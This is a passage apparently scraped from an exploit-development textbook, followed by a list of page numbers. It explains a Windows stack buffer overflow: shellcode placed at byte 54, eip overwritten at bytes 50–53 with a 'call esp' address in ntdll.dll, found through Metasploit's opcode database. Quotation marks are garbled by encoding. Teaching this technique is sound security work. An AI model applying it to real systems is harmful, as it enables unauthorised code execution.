You will often find
a portion if not all of your buffer in one of the registers when a Windows program
crashes. As seen in the last section, we control the area of the stack where the program
crashes. All we need to do is place our shellcode beginning at byte 54 and then overwrite
eip with an opcode to ???jmp esp??? or ???call esp??? at bytes 50??“53.We chose this attack vector
because either of those opcodes will place the value of esp into eip and execute it.
To find the address of that opcode in our binary, we remember that ntdll.dll is
dynamically loaded into our program at runtime.We can look inside that DLL and others
if necessary by searching the Metasploit opcode database at
http://metasploit.com/users/opcode/msfopcode.cgi?wizard=opcode&step=1
We will choose the first one: ???call esp??? at 0x77f510b0. Remember that for later.
NOTE This attack vector will not always work. You will have to look at
registers and work with what you??™ve got. For example, you may have to ???jmp
eax??? or ???jmp esi???.
Before crafting the exploit sandwich, we should determine the amount of buffer
space available in which to place our shellcode. The easiest way to do this is to throw lots
of As at the program and manually inspect the stack after the program crashes.
Pages:
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493